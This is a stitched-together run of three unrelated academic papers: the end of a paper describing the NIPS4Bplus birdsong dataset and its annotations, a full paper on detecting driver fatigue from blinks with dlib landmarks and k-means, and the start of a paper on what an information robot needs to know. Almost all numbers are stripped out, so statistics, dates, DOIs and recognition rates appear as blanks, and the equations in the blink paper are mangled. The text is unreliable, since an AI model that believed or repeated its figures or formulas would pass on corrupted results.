recordings were allocated so that the same species were active in both. finally, for training purposes, only species that could be covered by at least seven recordings in the training set were included in the final dataset, the rest were considered rare species’ occurrences that would make it hard to train any classifier; hence, they were discarded. the final training and testing set consist of files of total duration of less than an hour, and , files of total duration of nearly two hours, respectively. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bit.ly/ rbf cd https://www.wildlifeacoustics.com/images/pdfs/ultrasonicmicrophones.pdf https://www.wildlifeacoustics.com/images/pdfs/ultrasonicmicrophones.pdf https://www.wildlifeacoustics.com/ http://www.leclub-biotope.com/fr/ -sonochiro http://dx.doi.org/ . /peerj-cs. figure label occurrences on different regions. number of occurrences of each sound type in record- ings collected from spain, southern france and central france. full-size doi: . /peerjcs. /fig- annotations tags the labels for the species active in each recording of the training set were initially created for the nips b bird song classification challenge (glotin et al., ). there is a total of different bird species active in the dataset. for some species we discriminate the song from the call and from the drum. we also include some species living with these birds: nine insects and an amphibian. this tagging process resulted in classes. a detailed list of the class names and their corresponding species english and scientific names can be found in (morfi, stowell & pamuła, ). these tags only provide information about the species active in a recording and do not include any temporal information. in addition to the recordings containing bird vocalisations, some training files only contain background noise acquired from the same regions and have no bird song in them, these files can be used to tune a model during training. figure depicts the number of occurrences per class for recordings collected in each of the three different general regions of spain, south france and central france. each tag is represented by at least seven up to a maximum of recordings. each recording that contains bird vocalisations includes one to six individual labels. these files may contain different vocalisations from the same species and also may contain a variety of other species that vocalise along with this species. figure depicts the distribution of the number of active classes in the dataset. figure depicts the number of co-occurrences between pairs of labels. we can notice that there are no notable patterns to the ways species vocalisations co-occur. one interesting thing one can notice while studying the co-occurrence heat map is that there is no strong correlation between calls and songs from the same species, this is due to the different functions between calls and songs produced. as calls may be related to self-maintenance activities such as species identification or holding the flock together, while songs are mostly used for attracting a mate, establishing territories, intimidating enemies and learning through imitations and practising. temporal annotations temporal annotations for each recording in the training set of the nips b dataset were produced manually using sonic visualiser (https://www.sonicvisualiser.org/). the temporal morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.sonicvisualiser.org/ http://dx.doi.org/ . /peerj-cs. figure number of active classes throughout the dataset. distribution of number of active classes in dataset recordings. full-size doi: . /peerjcs. /fig- annotations were made by a single annotator, hanna pamuła, and can be found in (morfi, stowell & pamuła, ). table presents the temporal annotation format as is provided in nips bplus. in fig. we present the mean duration for every class activation in all the recordings. most classes have a brief duration of less than . s, with most of the insect classes (marked with red bars) having a longer duration. finally, in fig. we report the total number of activations for each class in the dataset, with the minimum being and the maximum being . in concern to the temporal annotations for the dataset, we should mention the following: • the original tags were used for guidance; however, some files were judged to have a different set of species than the ones given in the original metadata. similarly, in a few rare occurrences, despite the tags suggesting a bird species active in a recording, the annotator was not able to detect any bird vocalisation. • an extra ‘unknown’ tag was added to the dataset for vocalisations that could not be classified to a class. • an extra ‘human’ tag was added to a few recordings that have very obvious human sounds, such as speech, present in them. • out of the recordings of the training set recordings contain only background noise, hence no temporal annotations were needed for them. • of the remaining recordings that contain vocalisations, six could not be unambiguously labelled due to hard to identify vocalisations, thus no temporal annotation files were produced for them. • an annotation file for any recording containing multiple insects does not differentiate between the insect species and the ‘unknown’ label was given to all insect species present. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure label co-occurrence heat map. distribution of number of active classes in dataset recordings. full-size doi: . /peerjcs. /fig- table an example of nips bplus temporal annotations. starting time (sec) duration (sec) tag . . serser_call . . ptehey_song . . carcar_call . . carcar_call . . serser_call . . ptehey_song • in the rare case where no birds were active along with the insects no annotation file was provided. hence, seven recordings containing only insects were left unlabelled. • in total, recordings have no temporal annotation files. these can be used when training a model that does not use temporal annotations. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure mean value and standard deviation of the duration of each class in nips bplus in seconds. blue bars indicate bird label, red bars indicate insect label and green indicate amphibian. full-size doi: . /peerjcs. /fig- figure total number of each class activations in nips bplus. blue bars indicate bird label, red bars indicate insect label and green indicate amphibian. full-size doi: . /peerjcs. /fig- • on some occasions, the different syllables of a song were separated in time into different events while in other occasions they were summarised into a larger event, according to the judgement of the expert annotator. this variety could help train an unbiased model regarding separating events or grouping them together as one continuous time event. as mentioned above, each recording may contain multiple species vocalising at the same time. this can often occur in wildlife recordings and is important to be taken into account when training a model. fig. presents the fraction of the total duration containing overlapping vocalisations as well as the number of simultaneously occurring classes. example uses of nips bplus a few examples of the nips bplus dataset and temporal annotations being used can be found in (morfi & stowell, a) and (morfi & stowell, b). first, in (morfi & stowell, a), we use nips bplus to carry out the training and evaluation of a newly proposed multi-instance learning (mil) loss function for audio event detection. and in (morfi & stowell, b), we combine the proposed method of (morfi & stowell, a) and a network trained on the nips bplus tags that performs audio tagging in a multi-task learning (mtl) setting. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure number of simultaneous active classes over the total duration of the data. distribution of si- multaneous number of active classes on the total duration of the recordings. full-size doi: . /peerjcs. /fig- for both experiments, we split the nips b training dataset into a training set and a testing set. for our training set, the first recordings of the nips b training dataset are used, while the rest are included in our testing set, excluding recordings for which confident strong annotations could not be attained. those recordings are added to our training set resulting to a grand total of training recordings and testing recordings. out of the training recordings a small subset of them are used during training for validation purposes only. more specifically, the validation set consists of recordings ( containing at least one bird vocalisation, without any vocalisation), with the rest recordings ( containing at least one bird vocalisation, without any vocalisation) used only for training the model. detailed results can be found in morfi & stowell ( a) and morfi & stowell ( b). additional applications using nips bplus could include training models for bird species audio event detection and classification, evaluating how generalisable of method trained on a different set of data is, and many more. more specifically, the dataset and the temporal annotations can be used for evaluating methods that have been trained without temporally annotated data. in general, this kind of data, that lack temporal annotation, can be easily acquired in a large scale which is suitable for training deep learning approaches. however, temporally annotated data are needed to properly evaluate the performance of models that perform their prediction, hence another way of using nips bplus along with other datasets is as an evaluation set. conclusion in this paper, we present nips bplus, the first richly annotated birdsong audio dataset. nips bplus is comprised of the nips b dataset and tags used for the bird song morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. classification challenge plus the newly acquired temporal annotations. we provide statistical information about the recordings, their species specific tags and their temporal annotations. acknowledgements we thank sylvain vigant for providing recordings from central france, and biotope for making the data public for the nips b bird classification challenge. additional information and declarations funding dan stowell is supported by epsrc fellowship ep/l / . hanna pamuła is supported by agh-ust dean’s grant number . . . . sabiod mi cnrs provided financial support for the nips b challenge, and eadm madics cnrs provided anr- -ce - smiles supporting this research. grant disclosures the following grant information was disclosed by the authors: epsrc fellowship: ep/l / . agh-ust dean’s: . . . . nips b challenge. eadm madics cnrs: anr- -ce - . competing interests dan stowell is an academic editor for peerj. author contributions • veronica morfi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • yves bas, hanna pamuła and hervé glotin analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • dan stowell conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the data is available at figshare: morfi, veronica; stowell, dan; pamula, hanna ( ): nips bplus: transcriptions of nips b bird challenge training dataset. figshare. dataset. https://doi.org/ . /m .figshare. . morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. references adavanne s, drossos k, Çakir e, virtanen t. . stacked convolutional and recurrent neural networks for bird audio detection. in: th european signal processing conference (eusipco). – doi . /eusipco. . . adavanne s, virtanen t. . sound event detection using weakly labeled dataset with stacked convolutional and recurrent neural network. in: proceedings of the detection and classification of acoustic scenes and events workshop (dcase ). – . arriaga jg, cody ml, vallejo ee, taylor ce. . bird-db: a database for annotated bird song sequences. ecological informatics : – doi . /j.ecoinf. . . . brandes ts. . automated sound recording and analysis techniques for bird surveys and conservation. bird conservation international—bird conserv int :s –s doi . /s . briggs f, lakshminarayanan b, neal l, fern x, raich r, hadley s. jk, hadley as, betts mg. . acoustic classification of multiple simultaneous bird species: a multi-instance multi-label approach. journal of the acoustic society of america : – . dawson dk, efford mg. . bird population density estimated from acoustic signals. journal of applied ecology ( ): – doi . /j. - . . .x. drake kl, frey m, hogan d, hedley r. . using digital recordings and sonogram analysis to obtain counts of yellow rails. wildlife society bulletin ( ): – doi . /wsb. . fanioudakis l, potamitis i. . deep networks tag the location of bird vocalisations on audio spectrograms. arxiv preprint. arxiv: . . glotin h, lecun y, artières t, mallat s, tchernichovski o, halkias x. . neural information processing scaled for bioacoustics—from neurons to big data. in: proceedings of neural information processing scaled for bioacoustics: from neurons to big data, . available at http://sabiod.univ-tln.fr/nips b _book.pdf . goëau h, glotin h, vellinga w-p, planqué r, joly a. . lifeclef bird identification task : the arrival of deep learning. in: clef ceur-ws, vol. . – . available at http://ceur-ws.org/vol- / . goëau h, glotin h, vellinga w-p, planqué r, joly a. . lifeclef bird identification task . in: clef ceur-ws, vol. . available at http://ceur-ws.org/vol- / . knight ec, hannah kc, foley g, scott c, brigham rm, bayne e. . recommen- dations for acoustic recognizer performance assessment with application to five common automated signal recognition programs. avian conservation and ecology ( ):article . kroodsma d. . the singing life of birds: audio cd. in: the singing life of birds: the art and science of listening to birdsong. houghton mifflin. kumar a, raj b. . audio event detection using weakly labeled data. new york: acm, – . morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /eusipco. . http://dx.doi.org/ . /j.ecoinf. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /wsb. http://arxiv.org/abs/ . http://sabiod.univ-tln.fr/nips b _book.pdf http://ceur-ws.org/vol- / http://ceur-ws.org/vol- / http://ceur-ws.org/vol- / http://dx.doi.org/ . /peerj-cs. lambert kta, mcdonald pg. . a low-cost, yet simple and highly repeatable system for acoustically surveying cryptic species. austral ecology ( ): – doi . /aec. . lostanlen v, salamon j, farnsworth a, kelling s, bello jp. . birdvox-full-night: a dataset and benchmark for avian flight call detection. in: proceedings of the ieee icassp. pistacaway: ieee. luther d. . signaller: receiver coordination and the timing of communication in amazonian birds. biology letters : – doi . /rsbl. . . luther d, wiley r. . production and perception of communicatory signals in a noisy environment. biology letters : – doi . /rsbl. . . marques ta, thomas l, martin sw, mellinger dk, ward ja, moretti dj, harris d, tyack pl. . estimating animal population density using passive acoustics. biological reviews ( ): – doi . /brv. . morfi v, stowell d. a. data-efficient weakly supervised learning for low-resource audio event detection using deep learning. in: proceedings of the detection and classification of acoustic scenes and events workshop (dcase ). – . morfi v, stowell d. b. deep learning for audio event detection and tagging on low- resource datasets. applied sciences ( ):article doi . /app . morfi v, stowell d, pamuła h. . transcriptions of nips b bird challenge training dataset. (accessed on july ) doi . /m .figshare. . pacifici k, simons tr, pollock kh. . effects of vegetation and background noise on the detection process in auditory avian point-count surveys. the auk ( ): – doi . /auk. . . pellegrini t. . densely connected cnns for bird audio detection. in: th european signal processing conference (eusipco). – doi . /eusipco. . . roger v, bartcus m, chamroukhi f, glotin h. . unsupervised bioacoustic seg- mentation by hierarchical dirichlet process hidden markov model. in: multimedia tools and applications for environmental & biodiversity informatics. cham: springer, – . ruiz-muñoz jf, orozco-alzate m, castellanos-dominguez g. . multiple instance learning-based birdsong classification using unsupervised recording segmentation. in: proceedings of the th international conference on artificial intelligence, ijcai’ . menlo park: aaai press, – . salamon j, bello jp. . deep convolutional neural networks and data augmentation for environmental sound classification. ieee signal processing letters : – doi . /lsp. . . schlüter j. . learning to pinpoint singing voice from weakly labeled examples. in: proceedings of the th international society for music information retrieval conference (ismir ). available at http://www.ofai.at/~jan.schlueter/pubs/ _ismir.pdf . sovern sg, forsman ed, olson gs, biswell bl, taylor m, anthony rg. . barred owls and landscape attributes influence territory occupancy of northern spotted owls. the journal of wildlife management ( ): – doi . /jwmg. . morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /aec. http://dx.doi.org/ . /rsbl. . http://dx.doi.org/ . /rsbl. . http://dx.doi.org/ . /brv. http://dx.doi.org/ . /app http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /auk. . http://dx.doi.org/ . /eusipco. . http://dx.doi.org/ . /lsp. . http://www.ofai.at/~jan.schlueter/pubs/ _ismir.pdf http://dx.doi.org/ . /jwmg. http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - detection of blink state based on fatigued driving lei chao school of computer science and engineering, xi’an technological university xi’an, china e-mail:callofduty @ .com wang changyuan school of computer science and engineering, xi’an technological university xi’an, china e-mail:cyw @ .com li guang school of computer science and engineering, xi’an technological university xi’an, china e-mail: @qq.com shi lu school of computer science and engineering, xi’an technological university xi’an, china e-mail: @qq.com abstract—in recent years, with the improvement of the national economy, the penetration rate of automobiles has been increasing, and traffic accidents have also increased. fatigue driving is the main factor in many traffic accidents. fatigue driving can cause the driver's inattention, slow response, and make wrong decisions on danger signals, which affect the driver's personal safety. in modern development, driving safety is developing towards intelligence and safety. therefore, the detection of driver fatigue has become a generally accepted demand. this paper proposes a method to calculate the threshold of blinking, which can detect the blinking state of the driver in real time through video. during the driving process, when the driver is in the closed eye state for a long time, an early warning is issued to avoid the accident. this paper uses python language to achieve the first, through the digital image technology call dlib open source library to detect feature points of the face, and then measure the aspect ratio between the length and width of the human eye, and finally through the kmeans clustering algorithm to collect the ratio the analysis yields the blink threshold. the experimental results show that the recognition rate is . % when the video frame rate is , and the recognition accuracy is . %. the experimental results show that the method designed in this paper can quickly detect the fatigue characteristics of the human eye, has a higher recognition rate and accuracy for fatigue driving, and helps reduce the occurrence of traffic accidents. keywords-blinking algorithm; fatigue detection; digital image processing; clustering algorithm; key points of human eyes i. introduction with the improvement of people's material living standards, cars have become the main means of transportation for people, but the growing number of vehicles has led to more traffic accidents. according to statistics, fatigue driving is the main cause of traffic accidents[ , ].under normal circumstances, the medical community believes that there are two reasons for fatigue driving, one is because the driver's attention is too concentrated, and the other is that the body does not rest well. because of being in this state for a long time, the body will be fatigued, lose concentration, the driver will snoring, lose concentration, decrease the ability to judge dangerous situations, and cause traffic accidents. at present, there are relatively few applications of fatigue driving equipment in china's in-vehicle systems. fatigue detection mainly through facial features, eye and mouth features, human electrical signal characteristics and convolutional neural network characteristics[ , , ].the detection of facial features is generally based on the frequency of blinking eyes, the degree of mouth opening, and the frequency of head movements due to fatigue. the fatigue of human body electrical signals is generally the measurement of surface emg signals, because human fatigue can be expressed by muscle physiological information. surface emg signals can reflect real-time physiological processes of muscle information and physiological signals on the skin surface. convolutional neural networks generally extract facial features through image processing methods, and then extract the main features through convolutional layers, pooling layers, and fully connected layers to analyze and determine whether fatigue. chen[ ] uses the asm algorithm to accurately locate the eyes and mouth area, calculates the eye's aspect ratio, mouth height value, and black and white pixel ratio near the mouth, and obtains the blink frequency and mouth opening degree. the degree of mouth opening is used as an input to the fuzzy international journal of advanced network, monitoring and controls volume , no. , inference engine to obtain three types of fatigue levels to accurately quantify the degree of fatigue the method proposed in this paper is to judge the driver's fatigue driving according to the characteristics of the human eye. because the digital image processing open source visual library opencv comes with a human face detection library, but the disadvantage is that the lighting requirements are very high, the lighting slightly changed, it will be difficult to locate or inaccurate positioning[ ]. therefore, this paper chooses dlib open source library to detect human eye features. firstly, the face feature points provided by the dlib open source library are used to accurately calibrate the position of the face and the human eye, and then the aspect ratio between the length and the width of the human eye is measured. finally, the kmeans clustering algorithm is used to analyze the collected ratio. the threshold of blinking. figure below, a is the face feature points marked by dlib, and b is the feature point on the face of the paper. (a) feature points of a face annotation (b) recognition of face images figure . facial feature points ii. related work a. blink detection and threshold analysis methods this chapter mainly introduces the blink algorithm formula and blink threshold analysis method. the blink threshold analysis method uses the kmeans clustering algorithm in machine learning. there are many methods for blink detection, such as support vector machine classification, eye movement sequence analysis, convolutional neural network feature extraction, eye feature point analysis, etc. this article uses the eye feature analysis method. threshold analysis methods in machine learning usually use regression algorithms, decision tree methods, bayesian methods, and clustering algorithms. this article uses the kmeans clustering algorithm in machine learning. b. blinking formula there are currently many methods in the field of blink detection. andrej fogelto et al[ ] analyzed the relationship between the speed of blinking and the duration of time through the cyclic neural network (rnn), so as to better distinguish the state of blink and blink, through the comparison of one-way and two-way circulating neural networks. one-way neural networks work better in blink detection. however, neural networks have their own limitations. for example, network merging will lose a lot of information. in the field of face recognition, the relationship between part and whole is neglected, and each person's face features are different, so it takes a lot of time to train. parameter. renanhu et al[ ] trained the blink classifier through the adaboost algorithm, but the adaboost algorithm is very sensitive to the discrete data of the blink. the detection of the eye part during image processing is easily affected by the speed of light and object movement, just as the blinking behavior is fast. the process of. zengyouwen et al[ ] used the correlation between computer signals and the number of blinks to determine the fatigue state, but the experiment required special equipment and equipment, and the operation was difficult and difficult to implement. since the blinking algorithm proposed by soukupová[ ] has measured the blink threshold of the aspect ratio of the eye, using the support vector machine[ ] method to analyze the collected threshold of the blink to finally obtain an ear of . , the algorithm of this paper is the in addition, by measuring the aspect ratio of the eye, the key clustering algorithm in machine learning is used to obtain the blink threshold. as shown in figure . a, the absolute value of the longitudinal distance ab of the eye will become smaller when the eye is blinking. at this time, the ratio of cd to ab will suddenly become larger, so we analyze the threshold when the ratio international journal of advanced network, monitoring and controls volume , no. , becomes larger when blinking. figure a shows the distance between ab and cd, and b is the position of the human eye feature point marked by dlib. this paper proposes the blink threshold formula as follows:  sho pppp pp ldblinkthre        (a)  (b) figure . (a) the lateral distance is cd longitudinally ab; (b) dlib human eye calibration features c. kmeans clustering algorithm the kmeans algorithm is a relatively common algorithm in clustering algorithms. its advantage is that it is easy to implement and understand, and the calculation speed is fast. the core idea is to calculate the distance between the sample point and the centroid of the cluster, and divide the calculated result into the same cluster as the sample point with the centroid of the cluster. the similarity between samples in k-means is determined by the distance between them. the closer the distance is, the higher the similarity is. the common distance calculation methods are euclidean distance, euclidean distance and manhattan distance. european distance. in the cluster analysis, the formulas for two m-dimensional samples xi=(xi ,xi ,xi ...,xim) and xj=(xj ,xj ,xj ...,xjm) are as follows:     m k jkiked xxt )(dis   the steps of the k-means algorithm are as follows: ) first randomly select the centroids of k clusters. ) calculate the euclidean distance from each sample point to each centroid, and classify it into the cluster with the smallest center of mass, and then calculate the centroid of each new cluster. ) after all the sample points are divided, recalculate the position of the centroid of each cluster, and then iteratively calculate the distance from each sample point to the centroid of each cluster, and then re-divide the sample points. ) repeat steps and until after the iteration, the partitioning of all sample points remains unchanged, and k-means gets the optimal solution. the main problem of the calculation result is to ensure the convergence of the algorithm. here, the square error is calculated by the following formula, which is used to illustrate that the clustering effect can minimize the sum of squares in each cluster.    i )( )( ,    k ic i uxucj    uc,j represents the sum of squares of the distance from each sample point to its cluster, )(u ic represents the centroid of the cluster to which the i-th sample belongs, and the smaller  uc,j , all the sample points and their clusters the smaller the distance, the better the quality of the division. the termination condition of the k-means algorithm is that  uc,j converges to a minimum. in order to achieve clustering, the maximum value of the objective function is obtained. take a one-dimensional array as an example. j = ∑ ∑ (x(i) − uc(i)) xj∈ui k i=   transform the above formula to get: 𝜕𝐽 𝜕𝑢𝑖 = 𝜕 𝜕𝑢𝑖 ∑ ∑ (𝑥𝑗 − 𝑢𝑖 ) 𝑥𝑗∈𝑢𝑖 𝑘 𝑖= international journal of advanced network, monitoring and controls volume , no. , = ∑ ∑ (𝑥𝑗 − 𝑢𝑖 ) 𝑥𝑗∈𝑢𝑖 𝑘 𝑖= = (− ) ∗ ∑ (𝑥𝑗 − 𝑢𝑖 ) 𝑥𝑗∈𝑢𝑖 when    ij u ij ux x )(* - )( ui = |ci| ∑ xjxj∈ui the result of the optimization is to calculate the mean of the cluster. during the experiment, the algorithm may be too slow to achieve effective results because the data set is too large. therefore, you can specify the maximum number of convergence times for the k-means algorithm or specify the cluster center transformation threshold. when the algorithm reaches the maximum number of times or when the cluster center rate of change is less than a certain threshold, the algorithm stops updating. k-means algorithm advantages: easy to understand, easy to implement, high operating efficiency, the disadvantage is that the greedy strategy is used to cluster the sample points, resulting in easy local convergence of the algorithm, slower data processing in big data, and outliers and the noise is very sensitive, and a small number of outliers and noise points can have a significant impact on the averaging of the algorithm. iii. the experiment this article mainly introduces two aspects, one is to introduce the source of the experimental data set, and the other is to analyze the experimental data.figure shows the author's own data collection and analysis. from left to right, the first picture is the analysis of the blink value of the author's blinks, and the middle figure is when the blink threshold is . when kmeans = the blink data graph, the right graph is the actual record of the author's experiment. figure shows the data of a random experimental sample in the public data set. from left to right, the first figure analyzes the blinking value of the aspect ratio of the blinks in the experimental sample. the blink data graph at . , the right graph is the actual record of the experimental sample.this article uses the blink data set provided by zhejiang university[ ]. all the data in the data set is collected under the natural light of the room. there is no special illumination. the collected equipment is a common camera that comes with the computer. there are video clips and people participate. , four segments per person, these four segments represent a. front view without glasses; b. front view with thin edge glasses; c. front view with black frame glasses; d. view. participants spontaneously blink at the front of the camera at normal speed. the size of each video is * , the frame rate of the video is fps, and the duration of recording is generally about seconds. the experimenter usually blinks about to times, a total of blinks. the following are the results of data collection and analysis. the text person has blink-eye aspect ratio data kmeans= , the blink data chart the text person image figure . the following is the experimental data of the paper international journal of advanced network, monitoring and controls volume , no. , public data set times blinking eye aspect ratio data kmeans= , blinking data chart public data set sample figure . public data set sample the following table a is a comparison of the public data sets provided by zhejiang university and the experimental results of the text person. table b is a comparison of other methods with the method of this paper. renanhu[ ] trained the classifiers of blinking and closed eyes through the adaboosts algorithm. the person in the video is then tested for blinking. zhang wei[ ] performed a correlation analysis of the blink of the eye by analyzing the left forehead eeg signals attention and meditation and blink data. table i. compared with public datasets experimental sample 𝐁𝐥𝐢𝐧𝐤 𝐭𝐡𝐫𝐞𝐬𝐡𝐨𝐥𝐝 blink times number of recognition recognition rate text person . % public data set . . % table ii. compared with other literature literature recognition rate . % . % this article . % iv. conclusion this paper overcomes the shortcomings of digital image processing and opencv vision open source library, and combines the existing open source dlib machine learning library,the data between the vertical and horizontal ratio of blink is calculated by mathematical method, and the threshold value of the vertical and horizontal ratio of blink is analyzed by means of kmeans clustering algorithm in machine learning. according to the analysis of the public data set of zhejiang university, when the threshold value of the vertical and horizontal ratio of blink is . , the accurate recognition rate of blink is . %. through the experimental comparison, this algorithm can effectively detect the fatigue state of blink, which is more important this algorithm is fast, efficient and easy to transplant to various devices, and has great practical value in the field of fatigue driving. the shortcomings of the paper: for fatigue monitoring, not only eyes as a reference point, nose tip shaking, mouth opening and so on have an impact on face fatigue, so the fatigue detection algorithm in this paper needs to be improved. references [ ] m. hülsmann,d. donnermeyer,e. schäfer. a critical appraisal of studies on cyclic fatigue resistance of engine‐driven endodontic instruments[j]. international endodontic journal, , ( ). [ ] pierre thiffault,jacques bergeron. monotony of road environment and driver fatigue: a simulator study[j]. accident analysis and prevention, , ( ). international journal of advanced network, monitoring and controls volume , no. , [ ] liu longfei, wu shizhen, xu wangming. real-time detection method of fatigue driving based on face feature point analysis[j]. television technology, , ( ): - + . [ ] yan wang,rui huang,lei guo. eye gaze pattern analysis for fatigue detection based on gp-bcnn with esm[j]. pattern recognition letters, , . [ ] driver’s fatigue detection based on yawning extraction[j]. nawal alioua,aouatif amine,mohammed rziza,aboelmagd noureldin.international journal of vehicular technology. [ ] chen xin, li weixiang, li wei, zhang wenqing, zhu yuan. multi-feature fusion fatigue detection method based on improved asm [j]. computer engineering and design, , ( ): - . [ ] rafael c.gonzalez,richard e.woods.digital image processing,third edition[m], [ ] andrej fogelton,wanda benesova. eye blink completeness detection[j]. computer vision and image understanding, . [ ] ren anhu, liu bei. face recognition blink detection based on adaboost[j]. computer and digital engineering, , ( ): - . [ ] zeng youwen, feng zhen, zhu yabing, li qi.relationship between the number of blinks and fatigue based on eeg experiment[j].journal of changchun university of science and technology(natural science edition), , ( ): - . [ ] tereza soukupova ,́jan cˇ ech, eye blink detection using facial landmarks[j]. st computer vision winter workshop(cvww), [ ] j. manikandan,b. venkataramani. study and evaluation of a multi-class svm classifier using diminishing learning technique[j]. neurocomputing, , ( ). [ ] f.song, x.tan, x.liu and s.chen, eyes closeness detection from still images with multi-scale histograms of principal oriented gradients, pattern recognition, . [ ] zhang wei, he jian, zhang yan, zhou ming. a wearable fatigue driving detection system based on eeg and blink frequency[j]. computer engineering, , ( ): - + . https://kns.cnki.net/kcms/detail/detail.aspx?filename=sjhd &dbcode=sjhd what should we know to develop an information robot? submitted march accepted may published june corresponding author satoru satake, satoru@atr.jp academic editor yaochu jin additional information and declarations can be found on page doi . /peerj-cs. copyright satake et al. distributed under creative commons cc-by . open access what should we know to develop an information robot? satoru satake, keita nakatani, kotaro hayashi, takyuki kanda and michita imai atr intelligent robotics and communication laboratory, kyoto, japan abstract this paper is aimed at identifying the required knowledge for information robots. we addressed two aspects of this knowledge, ‘what should it know’ and ‘what should it do.’ the first part of this study was devoted to the former aspect. we investigated what information staff know and what people expect from information robots. we found that there are a lot of similarities. based on this, we developed a knowledge structure about an environment to be used to provide information. the developed knowledge structure worked well. in the field study we confirmed that the robot was able to answer most of the requests ( . %). however, regarding the latter aspect, although we initially replicated what human staff members do, the robot did not serve well. many users hesitated to speak, and remained quiet. here, we found that the knowledge for facilitating interaction was missing. we further designed the interaction flow to accommodate people who tend to be quiet. finally, our field study revealed that the improved interaction flow increased the success ratio of information providing from . % to . %. subjects robotics keywords information-providing, direction giving, belief about robots introduction direction giving is often considered as a desired task for social robots and embodied agents (cassell et al., ; kopp et al., ; ono, imai & ishiguro, ; okuno et al., ). in our daily life, one of the roles that frequently offer direction giving is information service (fig. ). such information booths/counters can be found in stations, airports, shopping malls, and sightseeing places. we wondered what would be the required ‘knowledge’ to develop for a robot that engages in such an information service. probably, most of us have experienced using information services, and many of us believe that we know what the information services are. thus, one would argue that it is just easy to develop such a robot. one might say that “i know from common sense what the information service is. i can just implement it.” is this true? we started the study with two research questions: • is our common knowledge about the tasks of information services (i.e., what they serve) applicable to information robot? how to cite this article satake et al. ( ), what should we know to develop an information robot? peerj comput. sci. :e ; doi . /peerj-cs. mailto:satoru@atr.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure information service. • can we create an information robot by replicating what human information staff knows and does? or, is there any missing knowledge? we first investigated what people would expect from an information robot, and confirmed that there are a lot of similarities with what human information staff does (section ‘information in a shopping mall’). thus, we decided to use knowledge about human information staff (what they know and what they do), and developed an information robot (section ‘system’). however, in regard to the second research question, the assumption was not true. thus, we further investigated missing knowledge (sections ‘preliminary trials: lack of ‘knowledge’ for interaction’ and ‘field experiment’). related works information-providing robots robots have been deployed as tour guides. there were a couple of museum robots that navigated around the environment and provided explanations (thrun et al., ). robots satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. are also used for interactive information-providing. for instance, gross et al. ( ) developed an article search robot which enables visitors to request an item and let the robot navigate to its location. input for these robots is often with guis, thus there are lists of destinations/items, one of which is chosen by the user. in contrast, in case of dialog-based system, the difficulty is to predict the set of requests users could ask. thus, there are assumptions made for the input, such as name of locations. for instance, a virtual agent, mack, developed by cassell et al. ( ) is able to respond with the names of locations and people in offices, and provide direction giving (kopp et al., ). but, in a real-world natural interaction, what users would ask for is not bound by such assumptions. in kanda et al. ( ), the robot provided direction-giving interaction in response to the name of locations in a shopping mall, and exceptions were handled by a human operator. that is, the system on its own did not address the questions beyond the assumptions. overall, in the previous studies, there was not much exploration for what people would ask/request in an information dialog with a robot. in contrast, we found that people ask various requests beyond the names of locations, and identified a required knowledge representation. direction-giving interaction it is reported that a good direction consists of pairs of actions and landmarks (daniel et al., ), such as “turn right at the post office, and . . . .” to provide such explanations, there is a technique to build a knowledge about spatial relationships among shops and corridors (morales et al., ). there are techniques to make a robot understand directions from humans (kollar et al., ); in the study of kollar and colleagues, the representation stores the relationship between the description of the entities in the space and the map. in these studies, the common assumption is that a system is able to provide directions if the name of a location is asked. in contrast, our study reveals other type of requests in information dialog, and we report on the required knowledge representation. note that it is well known in hri studies that gaze and pointing gestures make the interaction more natural and effective (e.g., sidner et al., ; mutlu, forlizzi & hodgins, ). the use of gesture in direction giving is also studied in conversational agents (kopp et al., ) as well as in human-like robots (ono, imai & ishiguro, ; okuno et al., ). our direction-giving behavior is informed by these studies. engagement in our study, we noticed some visitors remained silent, even after directly approaching the robot and hearing its requests to engage. relevant to this, there were studies about “engagement” process; that is, when people participate and feel connected in collaboration, their gaze will meet with each other and they do not quit the interaction (sidner, lee & lesh, ). rich and his colleagues developed a technique to detect engagement using people gaze (rich et al., ). kobayashi and his colleagues developed a technique to select a person to whom a robot should ask questions in multi-party interaction in the way a teacher appoints a student in a class for an answer (kobayashi et al., ). their technique satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. is based on the findings that people nodding and engaging in mutual gaze are more likely to answer than someone avoiding a meeting gaze. in contrast, the silent visitors in our study were people who voluntarily approached the robot. they typically behaved as if they were willing to interact with the robot but did not talk with it. knowledge representation there are several computer applications (e.g., google search or apple’s 